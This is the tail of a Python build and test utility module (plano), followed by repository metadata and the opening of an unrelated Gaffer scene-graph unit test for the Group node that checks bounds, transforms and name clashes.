self.stderr_result = None
_child_processes.append(self)
@property
def exit_code(self):
return self.returncode
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
kill(self)
def __repr__(self):
return "process {} (command {})".format(self.pid, _format_command(self.args))
class PlanoProcessError(_subprocess.CalledProcessError, PlanoError):
def __init__(self, proc):
super(PlanoProcessError, self).__init__(proc.exit_code, _format_command(proc.args, represent=False))
def _default_sigterm_handler(signum, frame):
for proc in _child_processes:
if proc.poll() is None:
proc.terminate()
exit(-(_signal.SIGTERM))
_signal.signal(_signal.SIGTERM, _default_sigterm_handler)
## String operations
def replace(string, expr, replacement, count=0):
return _re.sub(expr, replacement, string, count)
def remove_prefix(string, prefix):
if string is None:
return ""
if prefix and string.startswith(prefix):
string = string[len(prefix):]
return string
def remove_suffix(string, suffix):
if string is None:
return ""
if suffix and string.endswith(suffix):
string = string[:-len(suffix)]
return string
def shorten(string, max, ellipsis=None):
assert max is None or isinstance(max, int)
if string is None:
return ""
if max is None or len(string) < max:
return string
else:
if ellipsis is not None:
string = string + ellipsis
end = _max(0, max - len(ellipsis))
return string[0:end] + ellipsis
else:
return string[0:max]
def plural(noun, count=0, plural=None):
if noun in (None, ""):
return ""
if count == 1:
return noun
if plural is None:
if noun.endswith("s"):
plural = "{}ses".format(noun)
else:
plural = "{}s".format(noun)
return plural
def capitalize(string):
if not string:
return ""
return string[0].upper() + string[1:]
def base64_encode(string):
return _base64.b64encode(string)
def base64_decode(string):
return _base64.b64decode(string)
def url_encode(string):
return _urllib.parse.quote_plus(string)
def url_decode(string):
return _urllib.parse.unquote_plus(string)
## Temp operations
def get_system_temp_dir():
return _tempfile.gettempdir()
def get_user_temp_dir():
try:
return _os.environ["XDG_RUNTIME_DIR"]
except KeyError:
return join(get_system_temp_dir(), get_user())
def make_temp_file(suffix="", dir=None):
if dir is None:
dir = get_system_temp_dir()
return _tempfile.mkstemp(prefix="plano-", suffix=suffix, dir=dir)[1]
def make_temp_dir(suffix="", dir=None):
if dir is None:
dir = get_system_temp_dir()
return _tempfile.mkdtemp(prefix="plano-", suffix=suffix, dir=dir)
class temp_file(object):
def __init__(self, suffix="", dir=None):
if dir is None:
dir = get_system_temp_dir()
self.fd, self.file = _tempfile.mkstemp(prefix="plano-", suffix=suffix, dir=dir)
def __enter__(self):
return self.file
def __exit__(self, exc_type, exc_value, traceback):
_os.close(self.fd)
if not WINDOWS: # XXX
remove(self.file, quiet=True)
class temp_dir(object):
def __init__(self, suffix="", dir=None):
self.dir = make_temp_dir(suffix=suffix, dir=dir)
def __enter__(self):
return self.dir
def __exit__(self, exc_type, exc_value, traceback):
remove(self.dir, quiet=True)
## Time operations
def sleep(seconds, quiet=False):
_info(quiet, "Sleeping for {} {}", seconds, plural("second", seconds))
_time.sleep(seconds)
def get_time():
return _time.time()
def format_duration(duration, align=False):
assert duration >= 0
if duration >= 3600:
value = duration / 3600
unit = "h"
elif duration >= 5 * 60:
value = duration / 60
unit = "m"
else:
value = duration
unit = "s"
if align:
return "{:.1f}{}".format(value, unit)
elif value > 10:
return "{:.0f}{}".format(value, unit)
else:
return remove_suffix("{:.1f}".format(value), ".0") + unit
class Timer(object):
def __init__(self, timeout=None, timeout_message=None):
self.timeout = timeout
self.timeout_message = timeout_message
if self.timeout is not None and not hasattr(_signal, "SIGALRM"): # pragma: nocover
self.timeout = None
self.start_time = None
self.stop_time = None
def start(self):
self.start_time = get_time()
if self.timeout is not None:
self.prev_handler = _signal.signal(_signal.SIGALRM, self.raise_timeout)
self.prev_timeout, prev_interval = _signal.setitimer(_signal.ITIMER_REAL, self.timeout)
self.prev_timer_suspend_time = get_time()
assert prev_interval == 0.0, "This case is not yet handled"
def stop(self):
self.stop_time = get_time()
if self.timeout is not None:
assert get_time() - self.prev_timer_suspend_time > 0, "This case is not yet handled"
_signal.signal(_signal.SIGALRM, self.prev_handler)
_signal.setitimer(_signal.ITIMER_REAL, self.prev_timeout)
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.stop()
@property
def elapsed_time(self):
assert self.start_time is not None
if self.stop_time is None:
return get_time() - self.start_time
else:
return self.stop_time - self.start_time
def raise_timeout(self, *args):
raise PlanoTimeout(self.timeout_message)
## Unique ID operations
# Length in bytes, renders twice as long in hex
def get_unique_id(bytes=16):
assert bytes >= 1
assert bytes <= 16
uuid_bytes = _uuid.uuid4().bytes
uuid_bytes = uuid_bytes[:bytes]
return _binascii.hexlify(uuid_bytes).decode("utf-8")
## Value operations
def nvl(value, replacement):
if value is None:
return replacement
return value
def is_string(value):
return isinstance(value, str)
def is_scalar(value):
return value is None or isinstance(value, (str, int, float, complex, bool))
def is_empty(value):
return value in (None, "", (), [], {})
def pformat(value):
return _pprint.pformat(value, width=120)
def format_empty(value, replacement):
if is_empty(value):
value = replacement
return value
def format_not_empty(value, template=None):
if not is_empty(value) and template is not None:
value = template.format(value)
return value
def format_repr(obj, limit=None):
attrs = ["{}={}".format(k, repr(v)) for k, v in obj.__dict__.items()]
return "{}({})".format(obj.__class__.__name__, ", ".join(attrs[:limit]))
class Namespace(object):
def __init__(self, **kwargs):
for name in kwargs:
setattr(self, name, kwargs[name])
def __eq__(self, other):
return vars(self) == vars(other)
def __contains__(self, key):
return key in self.__dict__
def __repr__(self):
return format_repr(self)
## YAML operations
def read_yaml(file):
import yaml as _yaml
with _codecs.open(file, encoding="utf-8", mode="r") as f:
return _yaml.safe_load(f)
def write_yaml(file, data):
import yaml as _yaml
make_parent_dir(file, quiet=True)
with _codecs.open(file, encoding="utf-8", mode="w") as f:
_yaml.safe_dump(data, f)
return file
def parse_yaml(yaml):
import yaml as _yaml
return _yaml.safe_load(yaml)
def emit_yaml(data):
import yaml as _yaml
return _yaml.safe_dump(data)
## Test operations
def test(_function=None, name=None, timeout=None, disabled=False):
class Test(object):
def __init__(self, function):
self.function = function
self.name = nvl(name, self.function.__name__)
self.timeout = timeout
self.disabled = disabled
self.module = _inspect.getmodule(self.function)
if not hasattr(self.module, "_plano_tests"):
self.module._plano_tests = list()
self.module._plano_tests.append(self)
def __call__(self, test_run, unskipped):
try:
self.function()
except SystemExit as e:
error(e)
raise PlanoError("System exit with code {}".format(e))
def __repr__(self):
return "test '{}:{}'".format(self.module.__name__, self.name)
if _function is None:
return Test
else:
return Test(_function)
def skip_test(reason=None):
if _inspect.stack()[2].frame.f_locals["unskipped"]:
return
raise PlanoTestSkipped(reason)
class expect_exception(object):
def __init__(self, exception_type=Exception, contains=None):
self.exception_type = exception_type
self.contains = contains
def __enter__(self):
pass
def __exit__(self, exc_type, exc_value, traceback):
if exc_value is None:
assert False, "Never encountered expected exception {}".format(self.exception_type.__name__)
if self.contains is None:
return isinstance(exc_value, self.exception_type)
else:
return isinstance(exc_value, self.exception_type) and self.contains in str(exc_value)
class expect_error(expect_exception):
def __init__(self, contains=None):
super(expect_error, self).__init__(PlanoError, contains=contains)
class expect_timeout(expect_exception):
def __init__(self, contains=None):
super(expect_timeout, self).__init__(PlanoTimeout, contains=contains)
class expect_system_exit(expect_exception):
def __init__(self, contains=None):
super(expect_system_exit, self).__init__(SystemExit, contains=contains)
class expect_output(temp_file):
def __init__(self, equals=None, contains=None, startswith=None, endswith=None):
super(expect_output, self).__init__()
self.equals = equals
self.contains = contains
self.startswith = startswith
self.endswith = endswith
def __exit__(self, exc_type, exc_value, traceback):
result = read(self.file)
if self.equals is None:
assert len(result) > 0, result
else:
assert result == self.equals, result
if self.contains is not None:
assert self.contains in result, result
if self.startswith is not None:
assert result.startswith(self.startswith), result
if self.endswith is not None:
assert result.endswith(self.endswith), result
super(expect_output, self).__exit__(exc_type, exc_value, traceback)
def print_tests(modules):
if _inspect.ismodule(modules):
modules = (modules,)
for module in modules:
for test in module._plano_tests:
flags = "(disabled)" if test.disabled else ""
print(" ".join((str(test), flags)).strip())
def run_tests(modules, include="*", exclude=(), enable=(), unskip=(), test_timeout=300, fail_fast=False, verbose=False, quiet=False):
if _inspect.ismodule(modules):
modules = (modules,)
if is_string(include):
include = (include,)
if is_string(exclude):
exclude = (exclude,)
if is_string(enable):
enable = (enable,)
if is_string(unskip):
enable = (unskip,)
test_run = TestRun(test_timeout=test_timeout, fail_fast=fail_fast, verbose=verbose, quiet=quiet)
if verbose:
notice("Starting {}", test_run)
elif not quiet:
cprint("=== Configuration ===", color="cyan")
props = (
("Modules", format_empty(", ".join([x.__name__ for x in modules]), "[none]")),
("Test timeout", format_duration(test_timeout)),
("Fail fast", fail_fast),
)
print_properties(props)
print()
for module in modules:
if verbose:
notice("Running tests from module {} (file {})", repr(module.__name__), repr(module.__file__))
elif not quiet:
cprint("=== Module {} ===".format(repr(module.__name__)), color="cyan")
if not hasattr(module, "_plano_tests"):
warn("Module {} has no tests", repr(module.__name__))
continue
for test in module._plano_tests:
if test.disabled and not any([_fnmatch.fnmatchcase(test.name, x) for x in enable]):
continue
included = any([_fnmatch.fnmatchcase(test.name, x) for x in include])
excluded = any([_fnmatch.fnmatchcase(test.name, x) for x in exclude])
unskipped = any([_fnmatch.fnmatchcase(test.name, x) for x in unskip])
if included and not excluded:
test_run.tests.append(test)
_run_test(test_run, test, unskipped)
if not verbose and not quiet:
print()
total = len(test_run.tests)
skipped = len(test_run.skipped_tests)
failed = len(test_run.failed_tests)
if total == 0:
raise PlanoError("No tests ran")
notes = ""
if skipped != 0:
notes = "({} skipped)".format(skipped)
if failed == 0:
result_message = "All tests passed {}".format(notes).strip()
else:
result_message = "{} {} failed {}".format(failed, plural("test", failed), notes).strip()
if verbose:
if failed == 0:
notice(result_message)
else:
error(result_message)
elif not quiet:
cprint("=== Summary ===", color="cyan")
props = (
("Total", total),
("Skipped", skipped, format_not_empty(", ".join([x.name for x in test_run.skipped_tests]), "({})")),
("Failed", failed, format_not_empty(", ".join([x.name for x in test_run.failed_tests]), "({})")),
)
print_properties(props)
print()
cprint("=== RESULT ===", color="cyan")
if failed == 0:
cprint(result_message, color="green")
else:
cprint(result_message, color="red", bright="True")
print()
if failed != 0:
raise PlanoError(result_message)
def _run_test(test_run, test, unskipped):
if test_run.verbose:
notice("Running {}", test)
elif not test_run.quiet:
print("{:.<72} ".format(test.name + " "), end="")
timeout = nvl(test.timeout, test_run.test_timeout)
with temp_file() as output_file:
try:
with Timer(timeout=timeout) as timer:
if test_run.verbose:
test(test_run, unskipped)
else:
with output_redirected(output_file, quiet=True):
test(test_run, unskipped)
except KeyboardInterrupt:
raise
except PlanoTestSkipped as e:
test_run.skipped_tests.append(test)
if test_run.verbose:
notice("{} SKIPPED ({})", test, format_duration(timer.elapsed_time))
elif not test_run.quiet:
_print_test_result("SKIPPED", timer, "yellow")
print("Reason: {}".format(str(e)))
except Exception as e:
test_run.failed_tests.append(test)
if test_run.verbose:
_traceback.print_exc()
if isinstance(e, PlanoTimeout):
error("{} **FAILED** (TIMEOUT) ({})", test, format_duration(timer.elapsed_time))
else:
error("{} **FAILED** ({})", test, format_duration(timer.elapsed_time))
elif not test_run.quiet:
if isinstance(e, PlanoTimeout):
_print_test_result("**FAILED** (TIMEOUT)", timer, color="red", bright=True)
else:
_print_test_result("**FAILED**", timer, color="red", bright=True)
_print_test_error(e)
_print_test_output(output_file)
if test_run.fail_fast:
return True
else:
test_run.passed_tests.append(test)
if test_run.verbose:
notice("{} PASSED ({})", test, format_duration(timer.elapsed_time))
elif not test_run.quiet:
_print_test_result("PASSED", timer)
def _print_test_result(status, timer, color="white", bright=False):
cprint("{:<7}".format(status), color=color, bright=bright, end="")
print("{:>6}".format(format_duration(timer.elapsed_time, align=True)))
def _print_test_error(e):
cprint("--- Error ---", color="yellow")
if isinstance(e, PlanoProcessError):
print("> {}".format(str(e)))
else:
lines = _traceback.format_exc().rstrip().split("\n")
lines = ["> {}".format(x) for x in lines]
print("\n".join(lines))
def _print_test_output(output_file):
if get_file_size(output_file) == 0:
return
cprint("--- Output ---", color="yellow")
with open(output_file, "r") as out:
for line in out:
print("> {}".format(line), end="")
class TestRun(object):
def __init__(self, test_timeout=None, fail_fast=False, verbose=False, quiet=False):
self.test_timeout = test_timeout
self.fail_fast = fail_fast
self.verbose = verbose
self.quiet = quiet
self.tests = list()
self.skipped_tests = list()
self.failed_tests = list()
self.passed_tests = list()
def __repr__(self):
return format_repr(self)
## Plano command operations
_command_help = {
"build": "Build artifacts from source",
"clean": "Clean up the source tree",
"dist": "Generate distribution artifacts",
"install": "Install the built artifacts on your system",
"test": "Run the tests",
}
def command(_function=None, name=None, args=None, parent=None):
class Command(object):
def __init__(self, function):
self.function = function
self.module = _inspect.getmodule(self.function)
self.name = name
self.args = args
self.parent = parent
if self.parent is None:
self.name = nvl(self.name, function.__name__.rstrip("_").replace("_", "-"))
self.args = self.process_args(self.args)
else:
self.name = nvl(self.name, self.parent.name)
self.args = nvl(self.args, self.parent.args)
doc = _inspect.getdoc(self.function)
if doc is None:
self.help = _command_help.get(self.name)
self.description = self.help
else:
self.help = doc.split("\n")[0]
self.description = doc
if self.parent is not None:
self.help = nvl(self.help, self.parent.help)
self.description = nvl(self.description, self.parent.description)
debug("Defining {}", self)
for arg in self.args.values():
debug(" {}", str(arg).capitalize())
def __repr__(self):
return "command '{}:{}'".format(self.module.__name__, self.name)
def process_args(self, input_args):
sig = _inspect.signature(self.function)
params = list(sig.parameters.values())
input_args = {x.name: x for x in nvl(input_args, ())}
output_args = _collections.OrderedDict()
try:
app_param = params.pop(0)
except IndexError:
raise PlanoError("The function for {} is missing the required 'app' parameter".format(self))
else:
if app_param.name != "app":
raise PlanoError("The function for {} is missing the required 'app' parameter".format(self))
for param in params:
try:
arg = input_args[param.name]
except KeyError:
arg = CommandArgument(param.name)
if param.kind is param.POSITIONAL_ONLY: # pragma: nocover
if arg.positional is None:
arg.positional = True
elif param.kind is param.POSITIONAL_OR_KEYWORD and param.default is param.empty:
if arg.positional is None:
arg.positional = True
elif param.kind is param.POSITIONAL_OR_KEYWORD and param.default is not param.empty:
arg.optional = True
arg.default = param.default
elif param.kind is param.VAR_POSITIONAL:
if arg.positional is None:
arg.positional = True
arg.multiple = True
elif param.kind is param.VAR_KEYWORD:
continue
elif param.kind is param.KEYWORD_ONLY:
arg.optional = True
arg.default = param.default
else: # pragma: nocover
raise NotImplementedError(param.kind)
if arg.type is None and arg.default not in (None, False): # XXX why false?
arg.type = type(arg.default)
output_args[arg.name] = arg
return output_args
def __call__(self, app, *args, **kwargs):
from .commands import PlanoCommand
assert isinstance(app, PlanoCommand), app
command = app.bound_commands[self.name]
if command is not self:
command(app, *args, **kwargs)
return
debug("Running {} {} {}".format(self, args, kwargs))
app.running_commands.append(self)
dashes = "--" * len(app.running_commands)
display_args = list(self.get_display_args(args, kwargs))
with console_color("magenta", file=_sys.stderr):
eprint("{}> {}".format(dashes, self.name), end="")
if display_args:
eprint(" ({})".format(", ".join(display_args)), end="")
eprint()
self.function(app, *args, **kwargs)
cprint("<{} {}".format(dashes, self.name), color="magenta", file=_sys.stderr)
app.running_commands.pop()
if app.running_commands:
name = app.running_commands[-1].name
cprint("{}| {}".format(dashes[:-2], name), color="magenta", file=_sys.stderr)
def get_display_args(self, args, kwargs):
for i, arg in enumerate(self.args.values()):
if arg.positional:
if arg.multiple:
for va in args[i:]:
yield repr(va)
elif arg.optional:
value = args[i]
if value == arg.default:
continue
yield repr(value)
else:
yield repr(args[i])
else:
value = kwargs.get(arg.name, arg.default)
if value == arg.default:
continue
if value in (True, False):
value = str(value).lower()
else:
value = repr(value)
yield "{}={}".format(arg.display_name, value)
if _function is None:
return Command
else:
return Command(_function)
class CommandArgument(object):
def __init__(self, name, display_name=None, type=None, metavar=None, help=None, short_option=None, default=None, positional=None):
self.name = name
self.display_name = nvl(display_name, self.name.replace("_", "-"))
self.type = type
self.metavar = nvl(metavar, self.display_name.upper())
self.help = help
self.short_option = short_option
self.default = default
self.positional = positional
self.optional = False
self.multiple = False
def __repr__(self):
return "argument '{}' (default {})".format(self.name, repr(self.default))
if PLANO_DEBUG: # pragma: nocover
enable_logging(level="debug")
| {
"content_hash": "01da64500ad8556ee9813daf635785dc",
"timestamp": "",
"source": "github",
"line_count": 2102,
"max_line_length": 134,
"avg_line_length": 27.842055185537582,
"alnum_prop": 0.5872462579454583,
"repo_name": "ssorj/quiver",
"id": "b72327bf0421fdc9d42b61876431b5590f816889",
"size": "59314",
"binary": false,
"copies": "3",
"ref": "refs/heads/main",
"path": "subrepos/plano/src/plano/main.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "17422"
},
{
"name": "C#",
"bytes": "11911"
},
{
"name": "C++",
"bytes": "8922"
},
{
"name": "Dockerfile",
"bytes": "5205"
},
{
"name": "Java",
"bytes": "32102"
},
{
"name": "JavaScript",
"bytes": "6244"
},
{
"name": "Makefile",
"bytes": "11341"
},
{
"name": "Python",
"bytes": "261071"
},
{
"name": "Shell",
"bytes": "3827"
}
],
"symlink_target": ""
} |
import unittest
import threading
import gc
import IECore
import Gaffer
import GafferTest
import GafferScene
import GafferSceneTest
class GroupTest( GafferSceneTest.SceneTestCase ) :
def testTwoLevels( self ) :
sphere = IECore.SpherePrimitive()
input = GafferSceneTest.CompoundObjectSource()
input["in"].setValue(
IECore.CompoundObject( {
"bound" : IECore.Box3fData( sphere.bound() ),
"children" : {
"group" : {
"bound" : IECore.Box3fData( sphere.bound() ),
"children" : {
"sphere" : {
"bound" : IECore.Box3fData( sphere.bound() ),
"object" : sphere,
},
},
},
},
} ),
)
group = GafferScene.Group()
group["in"].setInput( input["out"] )
group["name"].setValue( "topLevel" )
self.assertEqual( group["name"].getValue(), "topLevel" )
self.assertEqual( group["out"].object( "/" ), IECore.NullObject() )
self.assertEqual( group["out"].transform( "/" ), IECore.M44f() )
self.assertEqual( group["out"].bound( "/" ), sphere.bound() )
self.assertEqual( group["out"].childNames( "/" ), IECore.InternedStringVectorData( [ "topLevel" ] ) )
self.assertEqual( group["out"].object( "/topLevel" ), IECore.NullObject() )
self.assertEqual( group["out"].transform( "/topLevel" ), IECore.M44f() )
self.assertEqual( group["out"].bound( "/topLevel" ), sphere.bound() )
self.assertEqual( group["out"].childNames( "/topLevel" ), IECore.InternedStringVectorData( [ "group" ] ) )
self.assertEqual( group["out"].object( "/topLevel/group" ), IECore.NullObject() )
self.assertEqual( group["out"].transform( "/topLevel/group" ), IECore.M44f() )
self.assertEqual( group["out"].bound( "/topLevel/group" ), sphere.bound() )
self.assertEqual( group["out"].childNames( "/topLevel/group" ), IECore.InternedStringVectorData( [ "sphere" ] ) )
self.assertEqual( group["out"].object( "/topLevel/group/sphere" ), sphere )
self.assertEqual( group["out"].transform( "/topLevel/group/sphere" ), IECore.M44f() )
self.assertEqual( group["out"].bound( "/topLevel/group/sphere" ), sphere.bound() )
self.assertEqual( group["out"].childNames( "/topLevel/group/sphere" ), IECore.InternedStringVectorData() )
def testTransform( self ) :
sphere = IECore.SpherePrimitive()
originalRootBound = sphere.bound()
originalRootBound.min += IECore.V3f( 1, 0, 0 )
originalRootBound.max += IECore.V3f( 1, 0, 0 )
input = GafferSceneTest.CompoundObjectSource()
input["in"].setValue(
IECore.CompoundObject( {
"bound" : IECore.Box3fData( originalRootBound ),
"children" : {
"sphere" : {
"object" : sphere,
"bound" : IECore.Box3fData( sphere.bound() ),
"transform" : IECore.M44fData( IECore.M44f.createTranslated( IECore.V3f( 1, 0, 0 ) ) ),
}
}
} )
)
group = GafferScene.Group()
group["in"].setInput( input["out"] )
group["transform"]["translate"].setValue( IECore.V3f( 0, 1, 0 ) )
self.assertEqual( group["name"].getValue(), "group" )
groupedRootBound = IECore.Box3f( originalRootBound.min, originalRootBound.max )
groupedRootBound.min += IECore.V3f( 0, 1, 0 )
groupedRootBound.max += IECore.V3f( 0, 1, 0 )
self.assertEqual( group["out"].object( "/" ), IECore.NullObject() )
self.assertEqual( group["out"].transform( "/" ), IECore.M44f() )
self.assertEqual( group["out"].bound( "/" ), groupedRootBound )
self.assertEqual( group["out"].childNames( "/" ), IECore.InternedStringVectorData( [ "group" ] ) )
self.assertEqual( group["out"].object( "/group" ), IECore.NullObject() )
self.assertEqual( group["out"].transform( "/group" ), IECore.M44f.createTranslated( IECore.V3f( 0, 1, 0 ) ) )
self.assertEqual( group["out"].bound( "/group" ), originalRootBound )
self.assertEqual( group["out"].childNames( "/group" ), IECore.InternedStringVectorData( [ "sphere" ] ) )
self.assertEqual( group["out"].object( "/group/sphere" ), sphere )
self.assertEqual( group["out"].transform( "/group/sphere" ), IECore.M44f.createTranslated( IECore.V3f( 1, 0, 0 ) ) )
self.assertEqual( group["out"].bound( "/group/sphere" ), sphere.bound() )
self.assertEqual( group["out"].childNames( "/group/sphere" ), IECore.InternedStringVectorData() )
def testAddAndRemoveInputs( self ) :
g = GafferScene.Group()
p = GafferScene.Plane()
def scenePlugNames() :
return [ plug.getName() for plug in g.children() if isinstance( plug, GafferScene.ScenePlug ) and plug.direction() == Gaffer.Plug.Direction.In ]
self.assertEqual( scenePlugNames(), [ "in"] )
g["in"].setInput( p["out"] )
self.assertEqual( scenePlugNames(), [ "in", "in1"] )
g["in1"].setInput( p["out"] )
self.assertEqual( scenePlugNames(), [ "in", "in1", "in2" ] )
g["in1"].setInput( None )
self.assertEqual( scenePlugNames(), [ "in", "in1" ] )
g["in"].setInput( None )
self.assertEqual( scenePlugNames(), [ "in" ] )
g["in"].setInput( p["out"] )
self.assertEqual( scenePlugNames(), [ "in", "in1"] )
g["in1"].setInput( p["out"] )
self.assertEqual( scenePlugNames(), [ "in", "in1", "in2" ] )
g["in"].setInput( None )
self.assertEqual( scenePlugNames(), [ "in", "in1", "in2" ] )
def testMerge( self ) :
sphere = IECore.SpherePrimitive()
input1 = GafferSceneTest.CompoundObjectSource()
input1["in"].setValue(
IECore.CompoundObject( {
"bound" : IECore.Box3fData( sphere.bound() ),
"children" : {
"sphereGroup" : {
"bound" : IECore.Box3fData( sphere.bound() ),
"children" : {
"sphere" : {
"bound" : IECore.Box3fData( sphere.bound() ),
"object" : sphere,
},
},
},
},
} ),
)
plane = IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -1 ), IECore.V2f( 1 ) ) )
input2 = GafferSceneTest.CompoundObjectSource()
input2["in"].setValue(
IECore.CompoundObject( {
"bound" : IECore.Box3fData( plane.bound() ),
"children" : {
"planeGroup" : {
"bound" : IECore.Box3fData( plane.bound() ),
"children" : {
"plane" : {
"bound" : IECore.Box3fData( plane.bound() ),
"object" : plane,
},
},
},
},
} ),
)
combinedBound = sphere.bound()
combinedBound.extendBy( plane.bound() )
group = GafferScene.Group()
group["name"].setValue( "topLevel" )
group["in"].setInput( input1["out"] )
group["in1"].setInput( input2["out"] )
self.assertEqual( group["out"].object( "/" ), IECore.NullObject() )
self.assertEqual( group["out"].transform( "/" ), IECore.M44f() )
self.assertEqual( group["out"].bound( "/" ), combinedBound )
self.assertEqual( group["out"].childNames( "/" ), IECore.InternedStringVectorData( [ "topLevel" ] ) )
self.assertEqual( group["out"].object( "/topLevel" ), IECore.NullObject() )
self.assertEqual( group["out"].transform( "/topLevel" ), IECore.M44f() )
self.assertEqual( group["out"].bound( "/topLevel" ), combinedBound )
self.assertEqual( group["out"].childNames( "/topLevel" ), IECore.InternedStringVectorData( [ "sphereGroup", "planeGroup" ] ) )
self.assertEqual( group["out"].object( "/topLevel/sphereGroup" ), IECore.NullObject() )
self.assertEqual( group["out"].transform( "/topLevel/sphereGroup" ), IECore.M44f() )
self.assertEqual( group["out"].bound( "/topLevel/sphereGroup" ), sphere.bound() )
self.assertEqual( group["out"].childNames( "/topLevel/sphereGroup" ), IECore.InternedStringVectorData( [ "sphere" ] ) )
self.assertEqual( group["out"].object( "/topLevel/sphereGroup/sphere" ), sphere )
self.assertEqual( group["out"].transform( "/topLevel/sphereGroup/sphere" ), IECore.M44f() )
self.assertEqual( group["out"].bound( "/topLevel/sphereGroup/sphere" ), sphere.bound() )
self.assertEqual( group["out"].childNames( "/topLevel/sphereGroup/sphere" ), IECore.InternedStringVectorData() )
self.assertEqual( group["out"].object( "/topLevel/planeGroup" ), IECore.NullObject() )
self.assertEqual( group["out"].transform( "/topLevel/planeGroup" ), IECore.M44f() )
self.assertEqual( group["out"].bound( "/topLevel/planeGroup" ), plane.bound() )
self.assertEqual( group["out"].childNames( "/topLevel/planeGroup" ), IECore.InternedStringVectorData( [ "plane" ] ) )
self.assertEqual( group["out"].object( "/topLevel/planeGroup/plane" ), plane )
self.assertEqual( group["out"].transform( "/topLevel/planeGroup/plane" ), IECore.M44f() )
self.assertEqual( group["out"].bound( "/topLevel/planeGroup/plane" ), plane.bound() )
self.assertEqual( group["out"].childNames( "/topLevel/planeGroup/plane" ), IECore.InternedStringVectorData() )
def testNameClashes( self ) :
sphere = IECore.SpherePrimitive()
input1 = GafferSceneTest.CompoundObjectSource()
input1["in"].setValue(
IECore.CompoundObject( {
"bound" : IECore.Box3fData( sphere.bound() ),
"children" : {
"myLovelyObject" : {
"bound" : IECore.Box3fData( sphere.bound() ),
"object" : sphere,
},
},
} ),
)
plane = IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -1 ), IECore.V2f( 1 ) ) )
input2 = GafferSceneTest.CompoundObjectSource()
input2["in"].setValue(
IECore.CompoundObject( {
"bound" : IECore.Box3fData( plane.bound() ),
"children" : {
"myLovelyObject" : {
"bound" : IECore.Box3fData( plane.bound() ),
"object" : plane,
},
},
} ),
)
combinedBound = sphere.bound()
combinedBound.extendBy( plane.bound() )
group = GafferScene.Group()
group["name"].setValue( "topLevel" )
group["in"].setInput( input1["out"] )
group["in1"].setInput( input2["out"] )
self.assertEqual( group["out"].object( "/" ), IECore.NullObject() )
self.assertEqual( group["out"].transform( "/" ), IECore.M44f() )
self.assertEqual( group["out"].bound( "/" ), combinedBound )
self.assertEqual( group["out"].childNames( "/" ), IECore.InternedStringVectorData( [ "topLevel" ] ) )
self.assertEqual( group["out"].object( "/topLevel" ), IECore.NullObject() )
self.assertEqual( group["out"].transform( "/topLevel" ), IECore.M44f() )
self.assertEqual( group["out"].bound( "/topLevel" ), combinedBound )
self.assertEqual( group["out"].childNames( "/topLevel" ), IECore.InternedStringVectorData( [ "myLovelyObject", "myLovelyObject1" ] ) )
self.assertEqual( group["out"].object( "/topLevel/myLovelyObject" ), sphere )
self.assertEqual( group["out"].transform( "/topLevel/myLovelyObject" ), IECore.M44f() )
self.assertEqual( group["out"].bound( "/topLevel/myLovelyObject" ), sphere.bound() )
self.assertEqual( group["out"].childNames( "/topLevel/myLovelyObject" ), IECore.InternedStringVectorData() )
self.assertEqual( group["out"].object( "/topLevel/myLovelyObject1" ), plane )
self.assertEqual( group["out"].transform( "/topLevel/myLovelyObject1" ), IECore.M44f() )
self.assertEqual( group["out"].bound( "/topLevel/myLovelyObject1" ), plane.bound() )
self.assertEqual( group["out"].childNames( "/topLevel/myLovelyObject1" ), IECore.InternedStringVectorData() )
def testSerialisationOfDynamicInputs( self ) :
s = Gaffer.ScriptNode()
s["c"] = GafferScene.Camera()
s["g"] = GafferScene.Group()
s["g"]["in"].setInput( s["c"]["out"] )
s["g"]["in1"].setInput( s["c"]["out"] )
self.failUnless( "in2" in s["g"] )
self.assertEqual( s["g"]["in2"].getInput(), None )
ss = s.serialise()
s = Gaffer.ScriptNode()
s.execute( ss )
self.failUnless( s["g"]["in"].getInput().isSame( s["c"]["out"] ) )
self.failUnless( s["g"]["in1"].getInput().isSame( s["c"]["out"] ) )
self.failUnless( "in2" in s["g"] )
self.assertEqual( s["g"]["in2"].getInput(), None )
def testNameClashesWithNumericSuffixes( self ) :
sphere = IECore.SpherePrimitive()
input1 = GafferSceneTest.CompoundObjectSource()
input1["in"].setValue(
IECore.CompoundObject( {
"bound" : IECore.Box3fData( sphere.bound() ),
"children" : {
"myLovelyObject1" : {
"bound" : IECore.Box3fData( sphere.bound() ),
"object" : sphere,
},
},
} ),
)
plane = IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -1 ), IECore.V2f( 1 ) ) )
input2 = GafferSceneTest.CompoundObjectSource()
input2["in"].setValue(
IECore.CompoundObject( {
"bound" : IECore.Box3fData( plane.bound() ),
"children" : {
"myLovelyObject1" : {
"bound" : IECore.Box3fData( plane.bound() ),
"object" : plane,
},
},
} ),
)
combinedBound = sphere.bound()
combinedBound.extendBy( plane.bound() )
group = GafferScene.Group()
group["name"].setValue( "topLevel" )
group["in"].setInput( input1["out"] )
group["in1"].setInput( input2["out"] )
self.assertEqual( group["out"].object( "/" ), IECore.NullObject() )
self.assertEqual( group["out"].transform( "/" ), IECore.M44f() )
self.assertEqual( group["out"].bound( "/" ), combinedBound )
self.assertEqual( group["out"].childNames( "/" ), IECore.InternedStringVectorData( [ "topLevel" ] ) )
self.assertEqual( group["out"].object( "/topLevel" ), IECore.NullObject() )
self.assertEqual( group["out"].transform( "/topLevel" ), IECore.M44f() )
self.assertEqual( group["out"].bound( "/topLevel" ), combinedBound )
self.assertEqual( group["out"].childNames( "/topLevel" ), IECore.InternedStringVectorData( [ "myLovelyObject1", "myLovelyObject2" ] ) )
self.assertEqual( group["out"].object( "/topLevel/myLovelyObject1" ), sphere )
self.assertEqual( group["out"].transform( "/topLevel/myLovelyObject1" ), IECore.M44f() )
self.assertEqual( group["out"].bound( "/topLevel/myLovelyObject1" ), sphere.bound() )
self.assertEqual( group["out"].childNames( "/topLevel/myLovelyObject1" ), IECore.InternedStringVectorData() )
self.assertEqual( group["out"].object( "/topLevel/myLovelyObject2" ), plane )
self.assertEqual( group["out"].transform( "/topLevel/myLovelyObject2" ), IECore.M44f() )
self.assertEqual( group["out"].bound( "/topLevel/myLovelyObject2" ), plane.bound() )
